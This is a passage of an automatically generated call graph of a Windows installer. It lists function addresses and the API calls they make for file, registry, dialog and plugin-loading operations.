lstrcpynA 5169->5174 5172 4019c4 5172->5170 5173 4019c9 lstrlenA 5172->5173 5173->5170 5174->5172 5175 1000161a 5176 10001649 5175->5176 5177 10001a5d 18 API calls 5176->5177 5178 10001650 5177->5178 5179 10001663 5178->5179 5180 10001657 5178->5180 5181 1000168a 5179->5181 5182 1000166d 5179->5182 5183 10001266 2 API calls 5180->5183 5185 10001690 5181->5185 5186 100016b4 5181->5186 5184 100014e2 3 API calls 5182->5184 5190 10001661 5183->5190 5187 10001672 5184->5187 5188 10001559 3 API calls 5185->5188 5189 100014e2 3 API calls 5186->5189 5191 10001559 3 API calls 5187->5191 5192 10001695 5188->5192 5189->5190 5193 10001678 5191->5193 5194 10001266 2 API calls 5192->5194 5195 10001266 2 API calls 5193->5195 5196 1000169b GlobalFree 5194->5196 5197 1000167e GlobalFree 5195->5197 5196->5190 5198 100016af GlobalFree 5196->5198 5197->5190 5198->5190 5199 401b5d 5200 401b6a 5199->5200 5201 401bae 5199->5201 5204 401bf2 5200->5204 5209 401b81 5200->5209 5202 401bb2 5201->5202 5203 401bd7 GlobalAlloc 5201->5203 5217 4022dd 5202->5217 5220 405ef7 lstrcpynA 5202->5220 5206 405f19 18 API calls 5203->5206 5205 405f19 18 API calls 5204->5205 5204->5217 5207 4022d7 5205->5207 5206->5204 5212 4056ed MessageBoxIndirectA 5207->5212 5218 405ef7 lstrcpynA 5209->5218 5210 401bc4 GlobalFree 5210->5217 5212->5217 5213 401b90 5219 405ef7 lstrcpynA 5213->5219 5215 401b9f 5221 405ef7 lstrcpynA 5215->5221 5218->5213 5219->5215 5220->5210 5221->5217 5222 401f5d 5223 402ace 18 API calls 5222->5223 5224 401f64 5223->5224 5225 406290 5 API calls 5224->5225 5226 401f73 5225->5226 5227 401f8b GlobalAlloc 5226->5227 5228 401ff3 5226->5228 5227->5228 5229 401f9f 5227->5229 5230 406290 5 API calls 5229->5230 5231 401fa6 5230->5231 5232 406290 5 API calls 5231->5232 5233 401fb0 5232->5233 5233->5228 5237 405e55 wsprintfA 5233->5237 5235 401fe7 5238 405e55 wsprintfA 5235->5238 5237->5235 5238->5228 5239 401a5e 5240 402aac 18 API calls 5239->5240 5241 401a64 5240->5241 5242 402aac 18 API calls 5241->5242 5243 401a0e 5242->5243 5244 4026e1 5245 4026e7 5244->5245 5246 4026eb FindNextFileA 5245->5246 5247 4026fd 5245->5247 5246->5247 5248 40273c 5246->5248 5250 405ef7 lstrcpynA 5248->5250 5250->5247 5258 401563 5259 402906 5258->5259 5262 405e55 wsprintfA 5259->5262 5261 40290b 5262->5261 4422 40166a 4423 402ace 18 API calls 4422->4423 4424 401671 4423->4424 4425 402ace 18 API calls 4424->4425 4426 40167a 4425->4426 4427 402ace 18 API calls 4426->4427 4428 401683 MoveFileA 4427->4428 4429 401696 4428->4429 4430 40168f 4428->4430 4431 4061fb 2 API calls 4429->4431 4434 402238 4429->4434 4432 401423 25 API calls 4430->4432 4433 4016a5 4431->4433 4432->4434 4433->4434 4436 405db2 MoveFileExA 4433->4436 4437 405dd3 4436->4437 4438 405dc6 4436->4438 4437->4430 4440 405c40 lstrcpyA 4438->4440 4441 405c68 4440->4441 4442 405c8e GetShortPathNameA 4440->4442 4467 405b6a GetFileAttributesA CreateFileA 4441->4467 4444 405ca3 4442->4444 4445 405dad 4442->4445 4444->4445 4447 405cab wsprintfA 4444->4447 4445->4437 4446 405c72 CloseHandle GetShortPathNameA 4446->4445 4448 405c86 4446->4448 4449 405f19 18 API calls 4447->4449 4448->4442 4448->4445 4450 405cd3 4449->4450 4468 405b6a GetFileAttributesA CreateFileA 4450->4468 4452 405ce0 4452->4445 4453 405cef GetFileSize GlobalAlloc 4452->4453 4454 405d11 4453->4454 4455 405da6 CloseHandle 4453->4455 4456 405be2 ReadFile 4454->4456 4455->4445 4457 405d19 4456->4457 4457->4455 4469 405acf lstrlenA 4457->4469 4460 405d30 lstrcpyA 4462 405d52 4460->4462 4461 405d44 4463 405acf 4 API calls 4461->4463 4464 405d89 SetFilePointer 4462->4464 4463->4462 4465 405c11 WriteFile 4464->4465 4466 405d9f GlobalFree 4465->4466 4466->4455 4467->4446 4468->4452 4470 405b10 lstrlenA 4469->4470 4471 405b18 4470->4471 4472 405ae9 lstrcmpiA 4470->4472 4471->4460 4471->4461 4472->4471 4473 405b07 CharNextA 4472->4473 4473->4470 5263 40486b 5264 404897 5263->5264 5265 40487b 5263->5265 5266 4048ca 5264->5266 5267 40489d SHGetPathFromIDListA 5264->5267 5274 4056d1 GetDlgItemTextA 5265->5274 5269 4048b4 SendMessageA 5267->5269 5270 4048ad 5267->5270 5269->5266 5272 40140b 2 API calls 5270->5272 5271 404888 SendMessageA 5271->5264 5272->5269 5274->5271 5275 4019ed 5276 402ace 18 API calls 5275->5276 5277 4019f4 5276->5277 5278 402ace 18 API calls 5277->5278 5279 4019fd 5278->5279 5280 401a04 lstrcmpiA 5279->5280 5281 401a16 lstrcmpA 5279->5281 5282 401a0a 5280->5282 5281->5282 5283 40256e 5284 402ace 18 API calls 5283->5284 5285 402575 5284->5285 5288 405b6a GetFileAttributesA CreateFileA 5285->5288 5287 402581 5288->5287 4474 40156f 4475 401586 4474->4475 4476 40157f ShowWindow 4474->4476 4477 401594 ShowWindow 4475->4477 4478 40295e 4475->4478 4476->4475 4477->4478 5289 4041f0 lstrcpynA lstrlenA 4479 4022f2 4480 4022fa 4479->4480 4482 402300 4479->4482 4481 402ace 18 API calls 4480->4481 4481->4482 4483 402ace 18 API calls 4482->4483 4485 402310 4482->4485 4483->4485 4484 40231e 4487 402ace 18 API calls 4484->4487 4485->4484 4486 402ace 18 API calls 4485->4486 4486->4484 4488 402327 WritePrivateProfileStringA 4487->4488 5290 100015b3 5291 100014bb GlobalFree 5290->5291 5293 100015cb 5291->5293 5292 10001611 GlobalFree 5293->5292 5294 100015e6 5293->5294 5295 100015fd VirtualFree 5293->5295 5294->5292 5295->5292 5296 4014f4 SetForegroundWindow 5297 40295e 5296->5297 4586 4024f5 4587 402bd8 19 API calls 4586->4587 4588 4024ff 4587->4588 4589 402aac 18 API calls 4588->4589 4590 402508 4589->4590 4591 402523 RegEnumKeyA 4590->4591 4592 40252f RegEnumValueA 4590->4592 4594 402729 4590->4594 4593 402548 RegCloseKey 4591->4593 4592->4593 4592->4594 4593->4594 5298 401cf5 5299 402aac 18 API calls 5298->5299 5300 401cfc 5299->5300 5301 402aac 18 API calls 5300->5301 5302 401d08 GetDlgItem 5301->5302 5303 40258a 5302->5303 4603 402377 4604 4023a7 4603->4604 4605 40237c 4603->4605 4607 402ace 18 API calls 4604->4607 4606 402bd8 19 API calls 4605->4606 4608 402383 4606->4608 4609 4023ae 4607->4609 4610 40238d 4608->4610 4614 4023c4 4608->4614 4615 402b0e RegOpenKeyExA 4609->4615 4611 402ace 18 API calls 4610->4611 4612 402394 RegDeleteValueA RegCloseKey 4611->4612 4612->4614 4616 402ba2 4615->4616 4622 402b39 4615->4622 4616->4614 4617 402b5f RegEnumKeyA 4618 402b71 RegCloseKey 4617->4618 4617->4622 4626 406290 GetModuleHandleA 4618->4626 4620 402b96 RegCloseKey 4625 402b85 4620->4625 4621 402b0e 5 API calls 4621->4622 4622->4617 4622->4618 4622->4620 4622->4621 4624 402bb1 RegDeleteKeyA 4624->4625 4625->4616 4627 4062b6 GetProcAddress 4626->4627 4628 4062ac 4626->4628 4630 402b81 4627->4630 4632 406222 GetSystemDirectoryA 4628->4632 4630->4624 4630->4625 4631 4062b2 4631->4627 4631->4630 4633 406244 wsprintfA LoadLibraryExA 4632->4633 4633->4631 5318 1000103d 5319 1000101b 5 API calls 5318->5319 5320 10001056 5319->5320 5321 4018fd 5322 401934 5321->5322 5323 402ace 18 API calls 5322->5323 5324 401939 5323->5324 5325 405799 69 API calls 5324->5325 5326 401942 5325->5326 4666 401fff 4667 402011 4666->4667 4668 4020bf 4666->4668 4669 402ace 18 API calls 4667->4669 4671 401423 25 API calls 4668->4671 4670 402018 4669->4670 4672 402ace 18 API calls 4670->4672 4676 402238 4671->4676 4673 402021 4672->4673 4674 402036 LoadLibraryExA 4673->4674 4675 402029 GetModuleHandleA 4673->4675 4674->4668 4677 402046 GetProcAddress 4674->4677 4675->4674 4675->4677 4678 402092 4677->4678 4679 402055 4677->4679 4680 405110 25 API calls 4678->4680 4681 402074 4679->4681 4682 40205d 4679->4682 4684 402065 4680->4684 4687 100016bd 4681->4687 4683 401423 25 API calls 4682->4683 4683->4684 4684->4676 4685 4020b3 FreeLibrary 4684->4685 4685->4676 4688 100016ed 4687->4688 4729 10001a5d 4688->4729 4690 100016f4 4691 1000180a 4690->4691 4692 10001705 4690->4692 4693 1000170c 4690->4693 4691->4684 4778 100021b0 4692->4778 4761 100021fa 4693->4761 4698 10001770 4704 100017b2 4698->4704 4705 10001776 4698->4705 4699 10001752 4791 100023da 4699->4791 4700 10001722 4703 10001728 4700->4703 4710 10001733 4700->4710 4701 1000173b 4715 10001731 4701->4715 4788 10002aa3 4701->4788 4703->4715 4772 100027e8 4703->4772 4708 100023da 11 API calls 4704->4708 4706 10001559 3 API calls 4705->4706 4712 1000178c 4706->4712 4713 100017a4 4708->4713 4709 10001758 4802 10001559 4709->4802 4782 10002589 4710->4782 4718 100023da 11 API calls 4712->4718 4728 100017f9 4713->4728 4813 100023a0 4713->4813 4715->4698 4715->4699 4717 10001739 4717->4715 4718->4713 4721 10001803 GlobalFree 4721->4691 4725 100017e5 4725->4728 4817 100014e2 wsprintfA 4725->4817 4727 100017de FreeLibrary 4727->4725 4728->4691 4728->4721 4820 10001215 GlobalAlloc 4729->4820 4731 10001a81 4821 10001215 GlobalAlloc 4731->4821 4733 10001cbb GlobalFree GlobalFree GlobalFree 4734 10001cd8 4733->4734 4749 10001d22 4733->4749 4735 1000201a 4734->4735 4744 10001ced 4734->4744 4734->4749 4737 1000203c GetModuleHandleA 4735->4737 4735->4749 4736 10001b60 GlobalAlloc 4756 10001a8c 4736->4756 4740 10002062 4737->4740 4741 1000204d LoadLibraryA 4737->4741 4738 10001bab lstrcpyA 4743 10001bb5 lstrcpyA 4738->4743 4739 10001bc9 GlobalFree 4739->4756 4828 100015a4 GetProcAddress 4740->4828 4741->4740 4741->4749 4743->4756 4744->4749 4824 10001224 4744->4824 4745 100020b3 4746 100020c0 lstrlenA 4745->4746 4745->4749 4829 100015a4 GetProcAddress 4746->4829 4748 10001f7a 4748->4749 4753 10001fbe lstrcpyA 4748->4753 4749->4690 4750 10002074 4750->4745 4760 1000209d GetProcAddress 4750->4760 4753->4749 4754 10001c07 4754->4756 4822 10001534 GlobalSize GlobalAlloc 4754->4822 4755 10001e75 GlobalFree 4755->4756 4756->4733 4756->4736 4756->4738 4756->4739 4756->4743 4756->4748 4756->4749 4756->4754 4756->4755 4759 10001224 2 API calls 4756->4759 4827 10001215 GlobalAlloc 4756->4827 4757 100020d9 4757->4749 4759->4756 4760->4745 4763 10002212 4761->4763 4762 10001224 GlobalAlloc lstrcpynA 4762->4763 4763->4762 4765 10002349 GlobalFree 4763->4765 4766 100022b9 GlobalAlloc MultiByteToWideChar 4763->4766 4767 1000230a lstrlenA 4763->4767 4831 100012ad 4763->4831 4765->4763 4768 10001712 4765->4768 4769 10002303 4766->4769 4770 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4766->4770 4767->4765 4767->4769 4768->4700 4768->4701 4768->4715 4769->4765 4835 1000251d 4769->4835 4770->4765 4774 100027fa 4772->4774 4773 1000289f EnumWindows 4775 100028bd 4773->4775 4774->4773 4776 100029b9 4775->4776 4777 100029ae GetLastError 4775->4777 4776->4715 4777->4776 4779 100021c0 4778->4779 4780 1000170b 4778->4780 4779->4780 4781 100021d2 GlobalAlloc 4779->4781 4780->4693 4781->4779 4786 100025a5 4782->4786 4783 100025f6 GlobalAlloc 4787 10002618 4783->4787 4784 10002609 4785 1000260e GlobalSize 4784->4785 4784->4787 4785->4787 4786->4783 4786->4784 4787->4717 4789 10002aae 4788->4789 4790 10002aee GlobalFree 4789->4790 4838 10001215 GlobalAlloc 4791->4838 4793 1000243a lstrcpynA 4800 100023e6 4793->4800 4794 1000244b StringFromGUID2 WideCharToMultiByte 4794->4800 4795 1000246f WideCharToMultiByte 4795->4800 4796 100024b4 GlobalFree 4796->4800 4797 10002490 wsprintfA 4797->4800 4798 100024ee GlobalFree 4798->4709 4799 10001266 2 API calls 4799->4800 4800->4793 4800->4794 4800->4795 4800->4796 4800->4797 4800->4798 4800->4799 4839 100012d1 4800->4839 4843 10001215 GlobalAlloc 4802->4843 4804 1000155f 4805 1000156c lstrcpyA 4804->4805 4807 10001586 4804->4807 4808 100015a0 4805->4808 4807->4808 4809 1000158b wsprintfA 4807->4809 4810 10001266 4808->4810 4809->4808 4811 100012a8 GlobalFree 4810->4811 4812 1000126f GlobalAlloc lstrcpynA 4810->4812 4811->4713 4812->4811 4814 100023ae 4813->4814 4816 100017c5 4813->4816 4815 100023c7 GlobalFree 4814->4815 4814->4816 4815->4814 4816->4725 4816->4727 4818 10001266 2 API calls 4817->4818 4819 10001503 4818->4819 4819->4728 4820->4731 4821->4756 4823 10001552 4822->4823 4823->4754 4830 10001215 GlobalAlloc 4824->4830 4826 10001233 lstrcpynA 4826->4749 4827->4756 4828->4750 4829->4757 4830->4826 4832 100012b4 4831->4832 4833 10001224 2 API calls 4832->4833 4834 100012cf 4833->4834 4834->4763 4836 10002581 4835->4836 4837 1000252b VirtualAlloc 4835->4837 4836->4769 4837->4836 4838->4800 4840 100012f9 4839->4840 4841 100012da 4839->4841 4840->4800 4841->4840 4842 100012e0 lstrcpyA 4841->4842 4842->4840 4843->4804 5334 401000 5335 401037 BeginPaint GetClientRect 5334->5335 5336 40100c DefWindowProcA 5334->5336 5338 4010f3 5335->5338 5339 401179 5336->5339 5340 401073 CreateBrushIndirect FillRect DeleteObject 5338->5340 5341 4010fc 5338->5341 5340->5338 5342 401102 CreateFontIndirectA 5341->5342 5343 401167 EndPaint 5341->5343 5342->5343 5344 401112 6 API calls 5342->5344 5343->5339 5344->5343 5345 401900 5346 402ace 18 API calls 5345->5346 5347 401907 5346->5347 5348 4056ed MessageBoxIndirectA 5347->5348 5349 401910 5348->5349 5350 401502 5351 40150a 5350->5351 5353 40151d 5350->5353 5352 402aac 18 API calls 5351->5352 5352->5353 3991 402483 4002 402bd8 3991->4002 3993 40248d 3994 402ace 18 API calls 3993->3994 3995 402496 3994->3995 3996 4024a0 RegQueryValueExA 3995->3996 3997 402729 3995->3997 3998 4024c0 3996->3998 3999 4024c6 RegCloseKey 3996->3999 3998->3999 4006 405e55 wsprintfA 3998->4006 3999->3997 4003 402ace 18 API calls 4002->4003 4004 402bf1 4003->4004 4005 402bff RegOpenKeyExA 4004->4005 4005->3993 4006->3999 5354 100029c3 5355 100029db 5354->5355 5356 10001534 2 API calls 5355->5356 5357 100029f6 5356->5357 4007 401c04 4029 402aac 4007->4029 4009 401c0b 4010 402aac 18 API calls 4009->4010 4011 401c18 4010->4011 4012 401c2d 4011->4012 4013 402ace 18 API calls 4011->4013 4014 401c3d 4012->4014 4015 402ace 18 API calls 4012->4015 4013->4012 4016 401c94 4014->4016 4017 401c48 4014->4017 4015->4014 4018 402ace 18 API calls 4016->4018 4019 402aac 18 API calls 4017->4019 4021 401c99 4018->4021 4020 401c4d 4019->4020 4022 402aac 18 API calls 4020->4022 4023 402ace 18 API calls 4021->4023 4024 401c59 4022->4024 4025 401ca2 FindWindowExA 4023->4025 4026 401c84 SendMessageA 4024->4026 4027 401c66 SendMessageTimeoutA 4024->4027 4028 401cc0 4025->4028 4026->4028 4027->4028 4030 405f19 18 API calls 4029->4030 4031 402ac1 4030->4031 4031->4009 5358 405084 5359 405094 5358->5359 5360 4050a8 5358->5360 5361 4050f1 5359->5361 5362 40509a 5359->5362 5363 4050b0 IsWindowVisible 5360->5363 5369 4050c7 5360->5369 5364 4050f6 CallWindowProcA 5361->5364 5365 404128 SendMessageA 5362->5365 5363->5361 5366 4050bd 5363->5366 5367 4050a4 5364->5367 5365->5367 5371 4049db SendMessageA 5366->5371 5369->5364 5376 404a5b 5369->5376 5372 404a3a SendMessageA 5371->5372 5373 4049fe GetMessagePos ScreenToClient SendMessageA 5371->5373 5375 404a32 5372->5375 5374 404a37 5373->5374 5373->5375 5374->5372 5375->5369 5385 405ef7 lstrcpynA 5376->5385 5378 404a6e 5386 405e55 wsprintfA 5378->5386 5380 404a78 5381 40140b 2 API calls 5380->5381 5382 404a81 5381->5382 5387 405ef7 lstrcpynA 5382->5387 5384 404a88 5384->5361 5385->5378 5386->5380 5387->5384 4042 403c09 4043 403c21 4042->4043 4044 403d5c 4042->4044 4043->4044 4045 403c2d 4043->4045 4046 403dad 4044->4046 4047 403d6d GetDlgItem GetDlgItem 4044->4047 4048 403c38 SetWindowPos 4045->4048 4049 403c4b 4045->4049 4051 403e07 4046->4051 4059 401389 2 API calls 4046->4059 4050 4040dc 19 API calls 4047->4050 4048->4049 4052 403c50 ShowWindow 4049->4052 4053 403c68 4049->4053 4054 403d97 SetClassLongA 4050->4054 4073 403d57 4051->4073 4112 404128 4051->4112 4052->4053 4056 403c70 DestroyWindow 4053->4056 4057 403c8a 4053->4057 4058 40140b 2 API calls 4054->4058 4111 404065 4056->4111 4060 403ca0 4057->4060 4061 403c8f SetWindowLongA 4057->4061 4058->4046 4062 403ddf 4059->4062 4065 403d49 4060->4065 4066 403cac GetDlgItem 4060->4066 4061->4073 4062->4051 4067 403de3 SendMessageA 4062->4067 4063 40140b 2 API calls 4069 403e19 4063->4069 4064 404067 DestroyWindow EndDialog 4064->4111 4131 404143 4065->4131 4070 403cdc 4066->4070 4071 403cbf SendMessageA IsWindowEnabled 4066->4071 4067->4073 4068 404096 ShowWindow 4068->4073 4069->4063 4069->4064 4069->4073 4074 405f19 18 API calls 4069->4074 4079 4040dc 19 API calls 4069->4079 4102 403fa7 DestroyWindow 4069->4102 4115 4040dc 4069->4115 4075 403ce9 4070->4075 4076 403d30 SendMessageA 4070->4076 4077 403cfc 4070->4077 4085 403ce1 4070->4085 4071->4070 4071->4073 4074->4069 4075->4076 4075->4085 4076->4065 4080 403d04 4077->4080 4081 403d19 4077->4081 4079->4069 4125 40140b 4080->4125 4084 40140b 2 API calls 4081->4084 4082 403d17 4082->4065 4086 403d20 4084->4086 4128 4040b5 4085->4128 4086->4065 4086->4085 4088 403e94 GetDlgItem 4089 403eb1 ShowWindow KiUserCallbackDispatcher 4088->4089 4090 403ea9 4088->4090 4118 4040fe KiUserCallbackDispatcher 4089->4118 4090->4089 4092 403edb EnableWindow 4095 403eef 4092->4095 4093 403ef4 GetSystemMenu EnableMenuItem SendMessageA 4094 403f24 SendMessageA 4093->4094 4093->4095 4094->4095 4095->4093 4119 404111 SendMessageA 4095->4119 4120 405ef7 lstrcpynA 4095->4120 4098 403f52 lstrlenA 4099 405f19 18 API calls 4098->4099 4100 403f63 SetWindowTextA 4099->4100 4121 401389 4100->4121 4103 403fc1 CreateDialogParamA 4102->4103 4102->4111 4104 403ff4 4103->4104 4103->4111 4105 4040dc 19 API calls 4104->4105 4106 403fff GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4105->4106 4107 401389 2 API calls 4106->4107 4108 404045 4107->4108 4108->4073 4109 40404d ShowWindow 4108->4109 4110 404128 SendMessageA 4109->4110 4110->4111 4111->4068 4111->4073 4113 404140 4112->4113 4114 404131 SendMessageA 4112->4114 4113->4069 4114->4113 4116 405f19 18 API calls 4115->4116 4117 4040e7 SetDlgItemTextA 4116->4117 4117->4088 4118->4092 4119->4095 4120->4098 4123 401390 4121->4123 4122 4013fe 4122->4069 4123->4122 4124 4013cb MulDiv SendMessageA 4123->4124 4124->4123 4126 401389 2 API calls 4125->4126 4127 401420 4126->4127 4127->4085 4129 4040c2 SendMessageA 4128->4129 4130 4040bc 4128->4130 4129->4082 4130->4129 4132 40415b GetWindowLongA 4131->4132 4142 4041e4 4131->4142 4133 40416c 4132->4133 4132->4142 4134 40417b GetSysColor 4133->4134 4135 40417e 4133->4135 4134->4135 4136 404184 SetTextColor 4135->4136 4137 40418e SetBkMode 4135->4137 4136->4137 4138 4041a6 GetSysColor 4137->4138 4139 4041ac 4137->4139 4138->4139 4140 4041b3 SetBkColor 4139->4140 4141 4041bd 4139->4141 4140->4141 4141->4142 4143 4041d0 DeleteObject 4141->4143 4144 4041d7 CreateBrushIndirect 4141->4144 4142->4073 4143->4144 4144->4142 4148 40270b 4149 402ace 18 API calls 4148->4149 4150 402712 FindFirstFileA 4149->4150 4151 402735 4150->4151 4152 402725 4150->4152 4153 40273c 4151->4153 4156 405e55 wsprintfA 4151->4156 4157 405ef7 lstrcpynA 4153->4157 4156->4153 4157->4152 5388 404a8d GetDlgItem GetDlgItem 5389 404adf 7 API calls 5388->5389 5395 404cf7 5388->5395 5390 404b82 DeleteObject 5389->5390 5391 404b75 SendMessageA 5389->5391 5392 404b8b 5390->5392 5391->5390 5393 404bc2 5392->5393 5394 405f19 18 API calls 5392->5394 5396 4040dc 19 API calls 5393->5396 5399 404ba4 SendMessageA SendMessageA 5394->5399 5398 404ddb 5395->5398 5405 4049db 5 API calls 5395->5405 5421 404d68 5395->5421 5402 404bd6 5396->5402 5397 404e87 5400 404e91 SendMessageA 5397->5400 5401 404e99 5397->5401 5398->5397 5407 404e34 SendMessageA 5398->5407 5431 404cea 5398->5431 5399->5392 5400->5401 5409 404eb2 5401->5409 5410 404eab ImageList_Destroy 5401->5410 5418 404ec2 5401->5418 5406 4040dc 19 API calls 5402->5406 5403 404143 8 API calls 5408 40507d 5403->5408 5404 404dcd SendMessageA 5404->5398 5405->5421 5422 404be4 5406->5422 5412 404e49 SendMessageA 5407->5412 5407->5431 5414 404ebb GlobalFree 5409->5414 5409->5418 5410->5409 5411 405031 5416 405043 ShowWindow GetDlgItem ShowWindow 5411->5416 5411->5431 5413 404e5c 5412->5413 5424 404e6d SendMessageA 5413->5424 5414->5418 5415 404cb8 GetWindowLongA SetWindowLongA 5417 404cd1 5415->5417 5416->5431 5419 404cd7 ShowWindow 5417->5419 5420 404cef 5417->5420 5418->5411 5430 404a5b 4 API calls 5418->5430 5435 404efd 5418->5435 5439 404111 SendMessageA 5419->5439 5440 404111 SendMessageA 5420->5440 5421->5398 5421->5404 5422->5415 5423 404c33 SendMessageA 5422->5423 5425 404cb2 5422->5425 5428 404c80 SendMessageA 5422->5428 5429 404c6f SendMessageA 5422->5429 5423->5422 5424->5397 5425->5415 5425->5417 5428->5422 5429->5422 5430->5435 5431->5403 5432 405007 InvalidateRect 5432->5411 5433 40501d 5432->5433 5441 404996 5433->5441 5434 404f2b SendMessageA 5438 404f41 5434->5438 5435->5434 5435->5438 5437 404fb5 SendMessageA SendMessageA 5437->5438 5438->5432 5438->5437 5439->5431 5440->5395 5444 4048d1 5441->5444 5443 4049ab 5443->5411 5445 4048e7 5444->5445 5446 405f19 18 API calls 5445->5446 5447 40494b 5446->5447 5448 405f19 18 API calls 5447->5448 5449 404956 5448->5449 5450 405f19 18 API calls 5449->5450 5451 40496c lstrlenA wsprintfA SetDlgItemTextA 5450->5451 5451->5443 4235 402590 4236 402595 4235->4236 4237 4025a9 4235->4237 4239 402aac 18 API calls 4236->4239 4238 402ace 18 API calls 4237->4238 4240 4025b0 lstrlenA 4238->4240 4241 40259e 4239->4241 4240->4241 4243 4025d2 4241->4243 4244 405c11 WriteFile 4241->4244 4245 405c2f 4244->4245 4245->4243 5459 401490 5460 405110 25 API calls 5459->5460 5461 401497 5460->5461 5462 402c13 5463 402c22 SetTimer 5462->5463 5464 402c3b 5462->5464 5463->5464 5465 402c89 5464->5465 5466 402c8f MulDiv 5464->5466 5467 402c49 wsprintfA SetWindowTextA SetDlgItemTextA 5466->5467 5467->5465 5469 401d95 GetDC 5470 402aac 18 API calls 5469->5470 5471 401da7 GetDeviceCaps MulDiv ReleaseDC 5470->5471 5472 402aac 18 API calls 5471->5472 5473 401dd8 5472->5473 5474 405f19 18 API calls 5473->5474 5475 401e15 CreateFontIndirectA 5474->5475 5476 40258a 5475->5476 5477 10001058 5479 10001074 5477->5479 5478 100010dc 5479->5478 5480 100014bb GlobalFree 5479->5480 5481 10001091 5479->5481 5480->5481 5482 100014bb GlobalFree 5481->5482 5483 100010a1 5482->5483 5484 100010b1 5483->5484 5485 100010a8 GlobalSize 5483->5485 5486 100010b5 GlobalAlloc 5484->5486 5488 100010c6 5484->5488 5485->5484 5487 100014e2 3 API calls 5486->5487 5487->5488 5489 100010d1 GlobalFree 5488->5489 5489->5478 5490 40451a 5491 404546 5490->5491 5492 404557 5490->5492 5551 4056d1 GetDlgItemTextA 5491->5551 5494 404563 GetDlgItem 5492->5494 5501 4045c2 5492->5501 5497 404577 5494->5497 5495 4046a6 5500 404850 5495->5500 5553 4056d1 GetDlgItemTextA 5495->5553 5496 404551 5498 406162 5 API calls 5496->5498 5499 40458b SetWindowTextA 5497->5499 5503 405a02 4 API calls 5497->5503 5498->5492 5504 4040dc 19 API calls 5499->5504 5507 404143 8 API calls 5500->5507 5501->5495 5501->5500 5505 405f19 18 API calls 5501->5505 5509 404581 5503->5509 5510 4045a7 5504->5510 5511 404636 SHBrowseForFolderA 5505->5511 5506 4046d6 5512 405a57 18 API calls 5506->5512 5508 404864 5507->5508 5509->5499 5516 405969 3 API calls 5509->5516 5513 4040dc 19 API calls 5510->5513 5511->5495 5514 40464e CoTaskMemFree 5511->5514 5515 4046dc 5512->5515 5517 4045b5 5513->5517 5518 405969 3 API calls 5514->5518 5554 405ef7 lstrcpynA 5515->5554 5516->5499 5552 404111 SendMessageA 5517->5552 5520 40465b 5518->5520 5523 404692 SetDlgItemTextA 5520->5523 5527 405f19 18 API calls 5520->5527 5522 4045bb 5525 406290 5 API calls 5522->5525 5523->5495 5524 4046f3 5526 406290 5 API calls 5524->5526 5525->5501 5533 4046fa 5526->5533 5528 40467a lstrcmpiA 5527->5528 5528->5523 5531 40468b lstrcatA 5528->5531 5529 404736 5555 405ef7 lstrcpynA 5529->5555 5531->5523 5532 40473d 5534 405a02 4 API calls 5532->5534 5533->5529 5537 4059b0 2 API calls 5533->5537 5539 40478e 5533->5539 5535 404743 GetDiskFreeSpaceA 5534->5535 5538 404767 MulDiv 5535->5538 5535->5539 5537->5533 5538->5539 5540 4047ff 5539->5540 5542 404996 21 API calls 5539->5542 5541 404822 5540->5541 5543 40140b 2 API calls 5540->5543 5556 4040fe KiUserCallbackDispatcher 5541->5556 5544 4047ec 5542->5544 5543->5541 5546 404801 SetDlgItemTextA 5544->5546 5547 4047f1 5544->5547 5546->5540 5549 4048d1 21 API calls 5547->5549 5548 40483e 5548->5500 5557 4044af 5548->5557 5549->5540 5551->5496 5552->5522 5553->5506 5554->5524 5555->5532 5556->5548 5558 4044c2 SendMessageA 5557->5558 5559 4044bd 5557->5559 5558->5500 5559->5558 5560 401d1a 5561 402aac 18 API calls 5560->5561 5562 401d28 SetWindowLongA 5561->5562 5563 40295e 5562->5563 4404 40159d 4405 402ace 18 API calls 4404->4405 4406 4015a4 SetFileAttributesA 4405->4406 4407 4015b6 4406->4407 5569 40149d 5570 4014ab PostQuitMessage 5569->5570 5571 4022dd 5569->5571 5570->5571 4408 401a1e 4409 402ace 18 API calls 4408->4409 4410 401a27 ExpandEnvironmentStringsA 4409->4410 4411 401a3b 4410->4411 4413 401a4e 4410->4413 4412 401a40 lstrcmpA 4411->4412 4411->4413 4412->4413 5572 40171f 5573 402ace 18 API calls 5572->5573 5574 401726 SearchPathA 5573->5574 5575 401741 5574->5575 5576 100010e0 5585 1000110e 5576->5585 5577 100011c4 GlobalFree 5578 100012ad 2 API calls 5578->5585 5579 100011c3 5579->5577 5580 100011ea GlobalFree 5580->5585 5581 10001266 2 API calls 5584 100011b1 GlobalFree 5581->5584 5582 10001155 GlobalAlloc 5582->5585 5583 100012d1 lstrcpyA 5583->5585 5584->5585 5585->5577 5585->5578 5585->5579 5585->5580 5585->5581 5585->5582 5585->5583 5585->5584 5586 10002162 5587 100021c0 5586->5587 5588 100021f6 5586->5588 5587->5588 5589 100021d2 GlobalAlloc 5587->5589 5589->5587 4414 401e25 4415 402aac 18 API calls 4414->4415 4416 401e2b 4415->4416 4417 402aac 18 API calls 4416->4417 4418 401e37 4417->4418 4419 401e43 ShowWindow 4418->4419 4420 401e4e EnableWindow 4418->4420 4421 40295e 4419->4421 4420->4421 5590 404225 5591 40423b 5590->5591 5598 404347 5590->5598 5595 4040dc 19 API calls 5591->5595 5592 4043b6 5593 4043c0 GetDlgItem 5592->5593 5594 40448a 5592->5594 5596 4043d6 5593->5596 5597 404448 5593->5597 5600 404143 8 API calls 5594->5600 5599 404291 5595->5599 5596->5597 5605 4043fc 6 API calls 5596->5605 5597->5594 5606 40445a 5597->5606 5598->5592 5598->5594 5602 40438b GetDlgItem SendMessageA 5598->5602 5601 4040dc 19 API calls 5599->5601 5603 404485 5600->5603 5604 40429e CheckDlgButton 5601->5604 5621 4040fe KiUserCallbackDispatcher 5602->5621 5619 4040fe KiUserCallbackDispatcher 5604->5619 5605->5597 5609 404460 SendMessageA 5606->5609 5610 404471 5606->5610 5609->5610 5610->5603 5613 404477 SendMessageA 5610->5613 5611 4043b1 5614 4044af SendMessageA 5611->5614 5612 4042bc GetDlgItem 5620 404111 SendMessageA 5612->5620 5613->5603 5614->5592 5616 4042d2 SendMessageA 5617 4042f0 GetSysColor 5616->5617 5618 4042f9 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5616->5618 5617->5618 5618->5603 5619->5612 5620->5616 5621->5611 5629 401f2d 5630 402ace 18 API calls 5629->5630 5631 401f34 5630->5631 5632 4061fb 2 API calls 5631->5632 5633 401f3a 5632->5633 